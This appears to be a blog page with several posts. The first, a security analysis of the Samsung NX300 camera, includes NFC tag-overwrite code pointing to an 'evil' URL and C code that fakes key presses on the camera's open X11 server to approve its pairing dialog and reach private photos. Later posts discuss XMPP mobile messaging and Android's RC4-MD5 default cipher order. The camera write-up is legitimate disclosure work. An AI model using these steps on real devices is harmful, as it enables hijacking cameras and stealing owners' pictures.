The tag is writable, so a malicious user can easily "hack" your camera by rewriting its tag to download some evil app, or to open nasty links in your web browser, merely by touching it with an NFC-enabled smartphone. This was confirmed by replacing the tag content with a URL.
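For illustration, such a rewrite takes only a few lines on Android (a sketch using the standard android.nfc API; the URL is obviously made up):
import android.nfc.NdefMessage;
import android.nfc.NdefRecord;
import android.nfc.Tag;
import android.nfc.tech.Ndef;

// Overwrite a writable NDEF tag with a single URI record (sketch);
// 'tag' comes from the NFC discovery intent.
public static void rewriteTag(Tag tag) throws Exception {
    NdefMessage evil = new NdefMessage(
            NdefRecord.createUri("http://example.com/evil"));
    Ndef ndef = Ndef.get(tag);
    ndef.connect();
    ndef.writeNdefMessage(evil);
    ndef.close();
}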
The deployed tag supports permanent write-locking, so if you know a prankster nerd, you might end up with a camera stuck redirecting you to a hardcore porn site.
WiFi Networking
You can configure the NX300 to join your WiFi network, where it will behave like a regular client with some open services, like DLNA. Let us see what exactly is offered by performing a port scan:
megavolt:~# nmap -sS -O nx300
Starting Nmap 6.25 ( http://nmap.org ) at 2013-11-21 22:37 CET
Nmap scan report for nx300.local (192.168.0.147)
Host is up (0.0089s latency).
Not shown: 999 closed ports
PORT STATE SERVICE
6000/tcp open X11
MAC Address: A0:21:95:**:**:** (Unknown)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
This scan was performed while the "E-Mail" application was open. In AllShare Play and MobileLink modes, 7676/tcp is opened in addition. Further, in Remote Viewfinder mode, the camera also opens 7679/tcp.
X Server
Wait, what? X11 as an open service? Could that be true? For sure it is access-locked via TCP to prevent abuse?
georg@megavolt:~$ DISPLAY=nx300:0 xlsfonts
-misc-fixed-medium-r-semicondensed--0-0-75-75-c-0-iso8859-1
-misc-fixed-medium-r-semicondensed--13-100-100-100-c-60-iso8859-1
-misc-fixed-medium-r-semicondensed--13-120-75-75-c-60-iso8859-1
6x13
cursor
fixed
georg@megavolt:~$ DISPLAY=nx300:0 xrandr
Screen 0: minimum 320 x 200, current 480 x 800, maximum 4480 x 4096
LVDS1 connected 480x800+0+0 (normal left inverted right x axis y axis) 480mm x 800mm
480x800 60.0*+
HDMI1 disconnected (normal left inverted right x axis y axis)
georg@megavolt:~$ for i in $(xdotool search '.') ; do xdotool getwindowname $i ; done
Defaulting to search window name, class, and classname
Enlightenment Background
acdaemon,key,receiver
Enlightenment Black Zone (0)
Enlightenment Frame
di-camera-app-nx300
Enlightenment Frame
smart-wifi-app-nx300
Nope! This is really an unprotected X server! It is running Enlightenment! And we can even run apps on it! But besides displaying stuff on the camera the fun seems very limited:
X11 Key Bindings
A short investigation using xev
outlines that the physical keys on the
camera body are bound to X11 key events as follows:
Camera Key | X11 Event
---|---
On/Off | XF86PowerOff (only when turning off)
Scroll Wheel | XF86ScrollUp / XF86ScrollDown
Direct Link | XF86Mail
Mode Wheel | F1 .. F10
Video Rec | XF86WebCam
+/- | XF86Reload
Menu | Menu
Fn | XF86HomePage
Keypad | KP_Left .. KP_Down, KP_Enter
Play | XF86Tools
Delete | KP_Delete
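Given the wide-open X server, these bindings can presumably also be triggered over the network, e.g. DISPLAY=nx300:0 xdotool key XF86WebCam to start a video recording remotely (an untested assumption of mine, but consistent with the key injection demonstrated below).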
WiFi Client: Firmware Update Check
When the camera goes online, it performs a firmware version check. First, it retrieves http://gld.samsungosp.com:
Request:
GET / HTTP/1.1
Content-Type: text/xml;charset=utf-8
Accept: application/x-shockwave-flash, application/vnd.ms-excel, */*
Accept-Language: ko
User-Agent: Mozilla/4.0
Host: gld.samsungosp.com
Response:
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/html
Date: Thu, 28 Nov 2013 16:23:48 GMT
Last-Modified: Mon, 31 Dec 2012 02:23:18 GMT
Server: nginx/0.7.65
Content-Length: 7
Connection: keep-alive
200 OK
This really looks like a no-op. But maybe this is a backdoor to allow for remote code execution? Who knows...
Then, a query to http://ipv4.connman.net/online/status.html returns an empty document, but has your location data (apparently obtained from the IP) in the headers:
X-ConnMan-Status: online
X-ConnMan-Client-IP: ###.###.##.###
X-ConnMan-Client-Address: ###.###.##.###
X-ConnMan-Client-Continent: EU
X-ConnMan-Client-Country: DE
X-ConnMan-Client-Region: ##
X-ConnMan-Client-City: ###### (my actual city)
X-ConnMan-Client-Latitude: ##.166698
X-ConnMan-Client-Longitude: ##.666700
X-ConnMan-Client-Timezone: Europe/Berlin
Wow! They know where I live! At least they do not transmit any unique identifiers with the query.
As the last step, the camera is asking for firmware versions and gets redirected to an XML document with the ChangeLog.
Known versions so far:
WiFi Access Point: UPnP/DLNA
Two of the on-camera apps (MobileLink, Remote Viewfinder) open an unencrypted access point named AP_SSC_NX300_0-XX:XX:XX (where XX:XX:XX is the device part of its MAC address). Fortunately, Samsung's engineers were smart and added a user confirmation dialog to the camera UI, to prevent remote abuse:
Unfortunately, this dialog is running on a wide-open X server, so all we need to do is fake a KP_Return key event (based on an example by bharathisubramanian), and we can connect with any client, stream a live video or download all the private pictures from the SD card, depending on the enabled mode:
#include <X11/Xlib.h>
#include <X11/Intrinsic.h>
#include <X11/extensions/XTest.h>
#include <unistd.h>
/* Send Fake Key Event */
static void SendKey (Display * disp, KeySym keysym, KeySym modsym){
KeyCode keycode = 0, modcode = 0;
keycode = XKeysymToKeycode (disp, keysym);
if (keycode == 0) return;
XTestGrabControl (disp, True);
/* Generate modkey press */
if (modsym != 0) {
modcode = XKeysymToKeycode(disp, modsym);
XTestFakeKeyEvent (disp, modcode, True, 0);
}
/* Generate regular key press and release */
XTestFakeKeyEvent (disp, keycode, True, 0);
XTestFakeKeyEvent (disp, keycode, False, 0);
/* Generate modkey release */
if (modsym != 0)
XTestFakeKeyEvent (disp, modcode, False, 0);
XSync (disp, False);
XTestGrabControl (disp, False);
}
/* Main Function */
int main (){
    Display *disp = XOpenDisplay (NULL); /* honors $DISPLAY, e.g. nx300:0 */
    sleep (1);
    /* Send Return to confirm the connection dialog */
    SendKey (disp, XK_Return, 0);
    return 0;
}
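For reference, this should build with something like gcc fakekey.c -o fakekey -lX11 -lXtst and be pointed at the camera via DISPLAY=nx300:0 ./fakekey (the file name and command lines are mine, not part of the original example).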
DLNA Service: Remote Viewfinder
The DLNA service is exposing some camera features, which are queried and used by the Android app. The device's friendly name is [Camera]NX300, as can be queried via HTTP from http://nx300:7676/smp_2_:
<dlna:X_DLNADOC>DMS-1.50</dlna:X_DLNADOC>
<deviceType>urn:schemas-upnp-org:device:MediaServer:1</deviceType>
<friendlyName>[Camera]NX300</friendlyName>
<manufacturer>Samsung Electronics</manufacturer>
<manufacturerURL>http://www.samsung.com</manufacturerURL>
<modelDescription>Samsung Camera DMS</modelDescription>
<modelName>SP1</modelName>
<modelNumber>1.0</modelNumber>
<modelURL>http://www.samsung.com</modelURL>
<serialNumber>20081113 Folderview</serialNumber>
<sec:X_ProductCap>smi,getMediaInfo.sec,getCaptionInfo.sec</sec:X_ProductCap>
<UDN>uuid:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX</UDN>
<serviceList>
<service>
<serviceType>urn:schemas-upnp-org:service:ContentDirectory:1</serviceType>
<serviceId>urn:upnp-org:serviceId:ContentDirectory</serviceId>
<controlURL>/smp_4_</controlURL>
<eventSubURL>/smp_5_</eventSubURL>
<SCPDURL>/smp_3_</SCPDURL>
</service>
<service>
<serviceType>urn:schemas-upnp-org:service:ConnectionManager:1</serviceType>
<serviceId>urn:upnp-org:serviceId:ConnectionManager</serviceId>
<controlURL>/smp_7_</controlURL>
<eventSubURL>/smp_8_</eventSubURL>
<SCPDURL>/smp_6_</SCPDURL>
</service>
</serviceList>
<sec:deviceID>
</sec:deviceID>
</device>
Additional SOAP services are provided for changing settings like focus and flash (/smp_3_):
Function | Arguments | Result |
---|---|---|
GetSystemUpdateID | Id | |
GetSearchCapabilities | SearchCaps | |
GetSortCapabilities | SortCaps | |
Browse | ObjectID BrowseFlag Filter StartingIndex RequestedCount SortCriteria | Result NumberReturned TotalMatches UpdateID |
GetIP | GETIPRESULT | |
GetInfomation | GETINFORMATIONRESULT StreamUrl | |
SetResolution | RESOLUTION | |
ZoomIN | CURRENTZOOM | |
ZoomOUT | CURRENTZOOM | |
MULTIAF | AFSTATUS | |
AF | AFSTATUS | |
setTouchAFOption | TOUCH_AF_OPTION | SET_OPTION_RESULT |
touchAF | AFPOSITION | TOUCHAF_RESULT |
AFRELEASE | AFRELEASERESULT | |
ReleaseSelfTimer | RELEASETIMER | |
Shot | AFSHOTRESULT | |
ShotWithGPS | GPSINFO | AFSHOTRESULT |
SetLED | LEDTIME | |
SetFlash | FLASHMODE | |
SetStreamQuality | Quality |
Another service is available for picture / video streaming (/smp_4_):
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:GetInfomationResponse xmlns:u="urn:schemas-upnp-org:service:ContentDirectory:1">
<GETINFORMATIONRESULT>
<Resolutions>
<Resolution><Width>5472</Width><Height>3648</Height></Resolution>
<Resolution><Width>1920</Width><Height>1080</Height></Resolution>
</Resolutions>
<Flash>
<Supports><Support>off</Support><Support>auto</Support></Supports>
<Defaultflash>auto</Defaultflash>
</Flash>
<FlashDisplay>
<Supports><Support>off</Support><Support>auto</Support></Supports>
<CurrentFlashDisplay>off</CurrentFlashDisplay>
</FlashDisplay>
<ZoomInfo>
<DefaultZoom>0</DefaultZoom>
<MaxZoom>1</MaxZoom>
</ZoomInfo>
<AVAILSHOTS>289</AVAILSHOTS>
<ROTATION>1</ROTATION>
<StreamQuality>
<Quality><Option>high</Option><Option>low</Option></Quality>
<Default>high</Default>
</StreamQuality>
</GETINFORMATIONRESULT>
<StreamUrl>
<QualityHighUrl>http://192.168.102.1:7679/livestream.avi</QualityHighUrl>
<QualityLowUrl>http://192.168.102.1:7679/qvga_livestream.avi</QualityLowUrl>
</StreamUrl>
</u:GetInfomationResponse>
</s:Body>
</s:Envelope>
After triggering the right commands, a live video stream should be available from http://nx300:7679/livestream.avi. However, a brief attempt to get some video with wget or mplayer failed.
Firmware "Source Code"
The "source code" package provided on Samsung's OSS Release Center is 834 MBytes compressed and mainly contains three copies of the rootfs image (400-500MB each), and then some scripts. The actual build root is hidden under the second paper sheet link in the "Announcements" column.
Also, there are Obama pics in TIZEN/project/NX300/image/rootdir/opt/sd0/DCIM/100PHOTO.
The project is built on an ancient version of Tizen, on which I am no expert. Somebody else needs to take this stuff apart, make a proper build environment, or port OpenWRT to it.
Full series:
In a post from 2009 I described why XEP-0198: Stream Management is very important for mobile XMPP clients and which client and server applications support it. I have updated the post over the years with links to bug tracker issues and release notes to keep track of the (still rather sad) state of affairs. Short summary:
Servers supporting XEP-0198 with stream resumption: Prosody IM.
Clients supporting XEP-0198 with stream resumption: Gajim, yaxim.
Today, with the release of yaxim 0.8.7, the first mobile client actually supporting the specification is available! With yax.im there is also a public XMPP server (based on Prosody) specifically configured to easily integrate with yaxim.
Now is a good moment to recapitulate what we can get from this combination, and where the (mobile) XMPP community should be heading next.
So I have XEP-0198, am I good now?
Unfortunately, it is still not that easy. With XEP-0198, you can resume the previous session within some minutes after losing the TCP connection. While you are gone, the server will continue to display you as "online" to your contacts, because the session resumption is transparent to all parties.
However, if you have been gone for too long, it is better to inform your contacts about your absence by showing you as "offline". This is accomplished by destroying your session, making a later resumption impossible. It is a matter of server configuration how much time passes until that happens, and it is an important configuration trade-off. The longer you appear as "online" while actually being gone, the more frustration might accumulate in your buddy about your lack of reaction – on the other hand, if the session is terminated too early and your client reconnects right after that, all the state is gone!
Now what exactly happens to messages sent to you when the server destroys the session? In Prosody, all messages pending since you disconnected are destroyed and error responses are sent back. This is perfectly legal as of XEP-0198, but a better solution would be to store them offline for later transmission.
However, offline storage is only useful if you are not connected with a different client at the same time. If you are, should the server redirect the messages to the other client? What if it already got them by means of carbon copies? How is your now-offline mobile client going to see that it missed something?
Even though XEP-0198 is a great step towards mobile messaging reliability, additional mechanisms need to be implemented to make XMPP really ready for mass-market usage (and users).
Entering Coverage Gaps
With XEP-0280: Message Carbons, all messages you send and receive on your desktop are automatically also copied to your mobile client, if it is online at that time. If you have a client like yaxim, that tries to stay online all the time and uses XEP-0198 to resume as fast as possible (on a typical 3G/WiFi change, this takes less than five seconds), you can have a completely synchronized message log on desktop and mobile.
However, if your smartphone is out of coverage for more than some minutes, the XEP-0198 session is destroyed, no message carbons are sent, and further messages are redirected to your desktop instead. When the mobile client finally reconnects, all it receives is suspicious silence.
XMPP was not designed for modern-day smartphone-based instant messaging. However, it is the best tool we have to counter the proprietary silo-based IM contenders like WhatsApp, Facebook Chat or Google Hangouts.
Therefore, we need to seek ways to provide the same (or a better) level of usability, without sacrificing the benefits of federation and open standards.
Message Synchronization
With XEP-0136: Message Archiving there is an arcane, properly over-engineered draft standard to allow a client to fetch collections of chat messages using a kind of version control system.
An easier, more modern approach is presented in XEP-0313: Message Archive Management (MAM). With MAM, it is much easier to synchronize the message log between a client and a server, as the server extends all messages sent to the client with an <archived> tag and an ID. Later, it is easily possible to obtain all messages that arrived since then by issuing a query with the last known archive ID.
Now it is up to the client implementors to add support for MAM! So far, it has been implemented in the web-based OTalk client; more will probably follow.
End-to-End Encryption
In the light of last year's revelations, it should be clear to everybody that end-to-end encryption is an essential part of any modern IM suite. Unfortunately, XMPP is not there yet. The XMPP Ubiquitous Encryption Manifesto is a step into the right direction, enforcing encryption of client-to-server connections as well as server-to-server connections. However, more needs to be done to protect against malicious server operators and sniffing of direct client-to-client transmissions.
There is Off-The Record Messaging (OTR), which provides strong encryption for chat conversations, and at the same time ensures (cryptographic) deniability. Unfortunately, cryptographic deniability provably does not save your ass. The only conclusion from that debacle can be: do not save any logs. This imposes a strong conflict of interest on Android, where the doctrine is: save everything to SQLite in case the OOM killer comes after you.
The other issue with OTR over XMPP (which some claim is solved in protocol version 3) is managing multiple (parallel) logins. OTR needs to keep the state of a conversation (encryption keys, initialization vectors and the like). If your chat buddy suddenly changes from a mobile device to the PC, the OTR state machine is confused, because that PC does not know the latest state. The result is that your conversation degrades into a bidirectional flood of "Can't decrypt this" error messages. This can be solved by storing the OTR state per resource (a resource is the unique identifier for each client you use with your account), as sketched below. This fix must be incorporated into all clients, and such things tend to take time. Ask me about adding OTR to yaxim next year.
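A minimal sketch of the per-resource fix; OtrSession is a stand-in for whatever state object your OTR library maintains, not a real API:

import java.util.HashMap;
import java.util.Map;

// Sketch: keep one OTR state per full JID (bare JID plus resource) instead
// of one per bare JID, so a device switch no longer confuses the protocol.
public class OtrSessionStore {
    static class OtrSession { /* keys, IVs, state machine, ... */ }

    private final Map<String, OtrSession> sessions = new HashMap<String, OtrSession>();

    // "juliet@example.com/mobile" and "juliet@example.com/pc" now get
    // independent states.
    public OtrSession forFullJid(String fullJid) {
        OtrSession s = sessions.get(fullJid);
        if (s == null) {
            s = new OtrSession();
            sessions.put(fullJid, s);
        }
        return s;
    }
}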
Oh, by the way. OTR also does not mix well with archiving or carbons!
There is of course also PGP, which also provides end-to-end encryption, but requires you to store your key on a mobile device (or have a separate key for it). PGP can be combined with all kinds of archiving/copying mechanisms, and you could even store the encrypted messages on your device, requiring an unlock whenever you open the conversation. But PGP is rather heavy-weight, and there is no easy key exchange mechanism (OTR excels here with the Socialist Millionaire approach).
Encrypted Media
And then there are lolcats[1]. The Internet was made for them. But the XMPP community kind-of missed the trend. There is XEP-0096: File Transfer and XEP-0166: Jingle to negotiate a data transmission between two clients. Both protocols allow negotiating in-band or proxy-based data transfers without encryption. "In-band" means that your multimedia file is split into handy chunks of at most 64 kilobytes each, base64-encoded, and sent via your server (and your buddy's server), causing significant processing overhead and possibly triggering rate limiting on the server. However, if you trust your server administrator(s), this is the most secure way to transmit a file in a standards-compliant way.
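A rough sketch of that chunking, to make the overhead tangible (the 4096-byte block size is a common choice, not mandated; XEP-0047 caps a chunk at 65535 bytes of raw data, and base64 adds another third on top; java.util.Base64 stands in for android.util.Base64 here):

import java.io.FileInputStream;
import java.io.IOException;
import java.util.ArrayList;
import java.util.Base64;
import java.util.List;

// Sketch: slice a file into chunks and base64-encode each one for
// embedding into a stanza; every chunk is a round-trip through both servers.
public class InBandChunker {
    static final int CHUNK_SIZE = 4096; // common block-size; 65535 is the maximum

    public static List<String> chunkAndEncode(String path) throws IOException {
        List<String> chunks = new ArrayList<>();
        try (FileInputStream in = new FileInputStream(path)) {
            byte[] buf = new byte[CHUNK_SIZE];
            int n;
            while ((n = in.read(buf)) > 0) {
                byte[] exact = new byte[n];
                System.arraycopy(buf, 0, exact, 0, n);
                chunks.add(Base64.getEncoder().encodeToString(exact));
            }
        }
        return chunks;
    }
}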
You could use PGP to manually encrypt the file, send it using one of the mentioned mechanisms, and let your buddy manually decrypt the file. Besides the usability implications (nobody will use this!), it is a great and secure approach.
But usability is a killer, and so of course there are some proposals for encrypted end-to-end communication.
WebRTC
The browser developers did it right with WebRTC. You can have an end-to-end encrypted video conference between two friggin' browsers! This must have rung some bells, and JSON is cool, so there was a proposal to stack JSON on top of XMPP for end-to-end encryption. Obviously because security is not complicated enough on its own.
XMPP Extensions Graveyard
Then there are ESessions, a deferred XEP from 2007, and Jingle-XTLS, which didn't even make it into an XEP, but looks promising otherwise. Maybe somebody should implement it, just to see if it works.
Custom Extensions
In the OTR specification v3, there is an additional mechanism to exchange a key for symmetric data encryption. This can be used to encrypt a file transmission or stream, in a non-standard way.
This is leveraged by CryptoCat, which is known for its security. CryptoCat splits the file into chunks of 64511 bytes (I am sure this is completely reasonable for an algorithm working on 16-byte blocks, so it needs to be applied 4031.9375 times), with the intention of fitting them into 64KB transmission units for in-band transmission. AES256 is used in CTR mode, and the transmissions are secured by HMAC-SHA512.
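The underlying construction is plain encrypt-then-MAC, which is easy to sketch with standard JCA primitives. Key derivation, IV handling and framing are simplified here and do not follow the actual CryptoCat spec:

import javax.crypto.Cipher;
import javax.crypto.Mac;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

// Sketch of the general scheme: AES-256 in CTR mode, then HMAC-SHA512
// computed over the ciphertext (encrypt-then-MAC).
public class ChunkCrypto {
    public static byte[] encryptChunk(byte[] chunk, byte[] aesKey256,
                                      byte[] iv16, byte[] macKey) throws Exception {
        Cipher aes = Cipher.getInstance("AES/CTR/NoPadding");
        aes.init(Cipher.ENCRYPT_MODE, new SecretKeySpec(aesKey256, "AES"),
                 new IvParameterSpec(iv16));
        byte[] ciphertext = aes.doFinal(chunk);

        Mac hmac = Mac.getInstance("HmacSHA512");
        hmac.init(new SecretKeySpec(macKey, "HmacSHA512"));
        byte[] tag = hmac.doFinal(ciphertext);

        byte[] out = new byte[ciphertext.length + tag.length];
        System.arraycopy(ciphertext, 0, out, 0, ciphertext.length);
        System.arraycopy(tag, 0, out, ciphertext.length, tag.length);
        return out;
    }
}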
In ChatSecure, the OTR key exchange is leveraged even further, stacking HTTP on top of OTR on top of XMPP messages (on top of TLS on top of TCP). This might allow for fast results and a high degree of (library) code reuse, but it makes the protocol hard to understand, and in-the-wild debugging even harder.
A completely different path is taken by Jitsi, where Jingle VoIP sessions are protected using Phil Zimmermann's ZRTP encryption scheme. Unfortunately, this mechanism does not transfer to file exchange.
And then iOS...
All the above only works on devices where you can keep a permanent connection to an XMPP server. Unfortunately, there is a huge walled garden full of devices that fail this simple task[2]. On Apple iOS, background connections are killed after a short time, and the app developer is "encouraged" to use Apple's Push Service instead to notify the user of incoming chat messages.
This feature is so bizarre that you cannot even count on the OS to launch your app when a "ping" message is received; you need to send all the content you want displayed in the user notification as part of the push payload. That means that as an iOS IM app author, you have the choice between sacrificing privacy (clear-text chat messages sent to Apple's "cloud") or usability (displaying an opaque notification along the lines of "Somebody sent you a message with some content, tap here to open the chat app to learn more").
And to add insult to injury, this mechanism is inherently incompatible with XMPP. If you write an XMPP client, your users should have the free choice of servers. However, as a client developer you need to centrally register your app and your own server(s) for Apple's push service to work.
Therefore, the iOS XMPP clients divide into two groups. In the first group, there are apps that do not use Apple Push; they maintain your privacy, but silently close the connection if the phone screen is turned off or another app is opened.
In the second group, there are apps that use their own custom proxy server, to which they forward your XMPP credentials (yes, your user name and password! They had better have a good privacy ToS). That proxy server then connects to your XMPP server and forwards all incoming and outgoing messages between your server and the app. If the app is killed by the OS, the proxy sends notifications via Apple Push, ensuring transparent functionality. Unfortunately, your privacy falls by the wayside, leaving a trail of data both with the proxy operators and Apple.
So currently, iOS users wishing for XMPP have the choice between broken security and broken usability – well done, Apple! Fortunately, there is light at the end of the tunnel. The oncoming train is an XEP proposal for Push Notifications (slides with explanation). It aims at separating the XMPP client, server, and push service tasks. The goal is to allow an XMPP client developer to provide their own push service, which the client app can register with any XMPP server. After the client app is killed, the XMPP server will inform the push service about a new message, which in turn informs Apple's (or any other OS vendor's) cloud, which in turn sends a push message to the device, which the user then can use to re-start the app.
This chain reaction is not perfect, and it does not solve the message-content privacy issue inherent to cloud notifications, but it would be a significant step forward. Let us hope it will be specified and implemented soon!
Summary
So we have solved connection stability (except on iOS). We know how to tackle synchronization of the message backlogs between mobile and desktop clients. Client connections are encrypted using TLS in almost all cases, server-to-server connections will follow soon (GMail, I am looking at you!).
End-to-end encryption of individual messages is well-handled by OTR, once all clients switch to storing the encryption state per resource. Group chats are out of luck currently.
The next big thing is to create an XMPP standard extension for end-to-end encryption of streaming data (files and real-time), to properly evaluate its security properties, and to implement it into one, two and all the other clients. Ideally, this should also cover group chats and group file sharing (e.g. on top of XEP-0214: File Repository and Sharing plus XEP-0329: File Information Sharing).
If we can manage that, we can also convince all the users of WhatsApp, Facebook and Google Hangouts to switch to an open protocol that is ready for the challenges of 2014.
[1] "Lolcats" here stands for any kind of multimedia content transmitted from one place to another. For the sake of this discussion, streaming content is considered as "multimedia" as much as the transmission of image, video or other files.
[2] Allegedly because it prevents evil apps from eating the device battery in the background. I am sure it is a feature indeed – one intended to route all your IM traffic through an infinite loop.
tl;dr
Android is using the combination of horribly broken RC4 and MD5 as the first default cipher on all SSL connections. This impacts all apps that did not care enough to change the list of enabled ciphers (i.e. almost all existing apps). This post investigates why RC4-MD5 is the default cipher, and why it replaced better ciphers which were in use prior to the Android 2.3 release in December 2010.
Preface
Some time ago, I was adding secure authentication to my APRSdroid app for Amateur Radio geolocation. While debugging its TLS handshake, I noticed that RC4-MD5 is leading the client's list of supported ciphers and thus wins the negotiation. As the task at hand was about authentication, not about secrecy, I did not care.
However, following speculations about what the NSA can decrypt, xnyhps' excellent post about XMPP clients (make sure to read the whole series) brought it into my focus again and I seriously asked myself what reasons led to it.
Status Quo Analysis
First, I fired up Wireshark, started yaxim on my Android 4.2.2 phone (CyanogenMod 10.1.3 on a Galaxy Nexus) and checked the Client Hello packet sent. Indeed, RC4-MD5 was first, followed by RC4-SHA1.
To quote from RFC 2246: "The CipherSuite list, passed from the client to the server in the client hello message, contains the combinations of cryptographic algorithms supported by the client in order of the client's preference (favorite choice first)." Thus, the server is encouraged to actually use RC4-MD5 if it is not explicitly forbidden by its configuration.
I dug out my legacy devices and cross-checked Android 2.2.1 (CyanogenMod 6.1.0 on HTC Dream), 2.3.4 (Samsung original ROM on Galaxy SII) and 2.3.7 (CyanogenMod 7 on a Galaxy 5):
Android 2.2.1 | Android 2.3.4, 2.3.7 | Android 4.2.2, 4.3 |
---|---|---|
DHE-RSA-AES256-SHA | RC4-MD5 | RC4-MD5 |
DHE-DSS-AES256-SHA | RC4-SHA | RC4-SHA |
AES256-SHA | AES128-SHA | AES128-SHA |
EDH-RSA-DES-CBC3-SHA | DHE-RSA-AES128-SHA | AES256-SHA |
EDH-DSS-DES-CBC3-SHA | DHE-DSS-AES128-SHA | ECDH-ECDSA-RC4-SHA |
DES-CBC3-SHA | DES-CBC3-SHA | ECDH-ECDSA-AES128-SHA |
DES-CBC3-MD5 | EDH-RSA-DES-CBC3-SHA | ECDH-ECDSA-AES256-SHA |
DHE-RSA-AES128-SHA | EDH-DSS-DES-CBC3-SHA | ECDH-RSA-RC4-SHA |
DHE-DSS-AES128-SHA | DES-CBC-SHA | ECDH-RSA-AES128-SHA |
AES128-SHA | EDH-RSA-DES-CBC-SHA | ECDH-RSA-AES256-SHA |
RC2-CBC-MD5 | EDH-DSS-DES-CBC-SHA | ECDHE-ECDSA-RC4-SHA |
RC4-SHA | EXP-RC4-MD5 | ECDHE-ECDSA-AES128-SHA |
RC4-MD5 | EXP-DES-CBC-SHA | ECDHE-ECDSA-AES256-SHA |
RC4-MD5 | EXP-EDH-RSA-DES-CBC-SHA | ECDHE-RSA-RC4-SHA |
EDH-RSA-DES-CBC-SHA | EXP-EDH-DSS-DES-CBC-SHA | ECDHE-RSA-AES128-SHA |
EDH-DSS-DES-CBC-SHA | | ECDHE-RSA-AES256-SHA |
DES-CBC-SHA | | DHE-RSA-AES128-SHA |
DES-CBC-MD5 | | DHE-RSA-AES256-SHA |
EXP-EDH-RSA-DES-CBC-SHA | | DHE-DSS-AES128-SHA |
EXP-EDH-DSS-DES-CBC-SHA | | DHE-DSS-AES256-SHA |
EXP-DES-CBC-SHA | | DES-CBC3-SHA |
EXP-RC2-CBC-MD5 | | ECDH-ECDSA-DES-CBC3-SHA |
EXP-RC2-CBC-MD5 | | ECDH-RSA-DES-CBC3-SHA |
EXP-RC4-MD5 | | ECDHE-ECDSA-DES-CBC3-SHA |
EXP-RC4-MD5 | | ECDHE-RSA-DES-CBC3-SHA |
| | EDH-RSA-DES-CBC3-SHA |
| | EDH-DSS-DES-CBC3-SHA |
| | DES-CBC-SHA |
| | EDH-RSA-DES-CBC-SHA |
| | EDH-DSS-DES-CBC-SHA |
| | EXP-RC4-MD5 |
| | EXP-DES-CBC-SHA |
| | EXP-EDH-RSA-DES-CBC-SHA |
| | EXP-EDH-DSS-DES-CBC-SHA |
As can be seen, Android 2.2.1 came with a set of AES256-SHA1 ciphers first, followed by 3DES and AES128. Android 2.3 significantly reduced security by removing AES256 and putting the broken RC4-MD5 in the most prominent first place, followed by the not-so-much-better RC4-SHA1.
Wait... What?
Yes, Android versions before 2.3 were using AES256 > 3DES > AES128 > RC4, and starting with 2.3 it became: RC4 > AES128 > 3DES. Also, the recently broken MD5 suddenly became the favorite MAC (Update: MD5 in TLS is OK, as it is used inside the HMAC construction, which is not affected by the known collision attacks).
As Android 2.3 was released in late 2010, speculations about the NSA pouring money on Android developers to sabotage all of us poor users arose immediately. I needed to do something, so I wrote a minimal test program (APK, source) and single-stepped it to find the origin of the default cipher list.
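The gist of such a test program fits into a few lines (a sketch along the same lines, not the linked APK):

import javax.net.ssl.SSLSocket;
import javax.net.ssl.SSLSocketFactory;

// Sketch: create a default SSL socket and dump the enabled cipher suites
// in negotiation order, most preferred first.
public class CipherListDump {
    public static void main(String[] args) throws Exception {
        SSLSocketFactory f = (SSLSocketFactory) SSLSocketFactory.getDefault();
        SSLSocket s = (SSLSocket) f.createSocket(); // unconnected is fine here
        for (String cipher : s.getEnabledCipherSuites()) {
            System.out.println(cipher);
        }
    }
}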
It turned out to be in Android's libcore package, NativeCrypto.getDefaultCipherSuites() which returns a hardcoded String array starting with "SSL_RSA_WITH_RC4_128_MD5".
Diving Into the Android Source
Going back on that file's change history revealed interesting things, like the addition of TLS v1.1 and v1.2 and its almost immediate removal with a suspicious commit message (taking place between Android 4.0 and 4.1, possible reasoning), added support for Elliptic Curves and AES256 in Android 3.x, and finally the addition of our hardcoded string list sometime before Android 2.3:
public static String[] getDefaultCipherSuites() {
- int ssl_ctx = SSL_CTX_new();
- String[] supportedCiphers = SSL_CTX_get_ciphers(ssl_ctx);
- SSL_CTX_free(ssl_ctx);
- return supportedCiphers;
+ return new String[] {
+ "SSL_RSA_WITH_RC4_128_MD5",
+ "SSL_RSA_WITH_RC4_128_SHA",
+ "TLS_RSA_WITH_AES_128_CBC_SHA",
...
+ "SSL_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA",
+ "SSL_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA"
+ };
}
The commit message tells us: "We now have a default cipher suite list that is chose [sic] to match RI behavior and priority, not based on OpenSSLs default and priorities."
Translated into English: before, we just used the list from OpenSSL (which was really good), now we make our own list... with blackjack! ...and hookers! ...with RC4! ...and MD5!
The test suite comes with another hint:
// Note these are added in priority order as defined by RI 6 documentation.
That RI 6 for sure has nothing to do with MI 6, but stands for Reference Implementation, the Sun (now Oracle) Java SDK version 6.
So what the fine Google engineers did to reduce our security was merely to copy what was there, defined by the inventors of Java!
Cipher Order in the Java Runtime
In the Java reference implementation, the code responsible for creating the cipher list is split into two files. First, a priority-ordered set of ciphers is constructed in the CipherSuite class:
// Definition of the CipherSuites that are enabled by default.
// They are listed in preference order, most preferred first.
int p = DEFAULT_SUITES_PRIORITY * 2;
add("SSL_RSA_WITH_RC4_128_MD5", 0x0004, --p, K_RSA, B_RC4_128, N);
add("SSL_RSA_WITH_RC4_128_SHA", 0x0005, --p, K_RSA, B_RC4_128, N);
...
Then, all enabled ciphers with sufficient priority are added to the list for CipherSuiteList.getDefault(). The cipher list has not experienced relevant changes since the initial import of Java 6 into Hg, when the OpenJDK was brought to life.
Going back in time reveals that even in the 1.4.0 JDK, the first one incorporating the JSSE extension for SSL/TLS, the list was more or less the same:
Java 1.4.0 (2002) | Java 1.4.2_19, 1.5.0 (2004) | Java 1.6 (2006) |
---|---|---|
SSL_RSA_WITH_RC4_128_SHA | SSL_RSA_WITH_RC4_128_MD5 | SSL_RSA_WITH_RC4_128_MD5 |
SSL_RSA_WITH_RC4_128_MD5 | SSL_RSA_WITH_RC4_128_SHA | SSL_RSA_WITH_RC4_128_SHA |
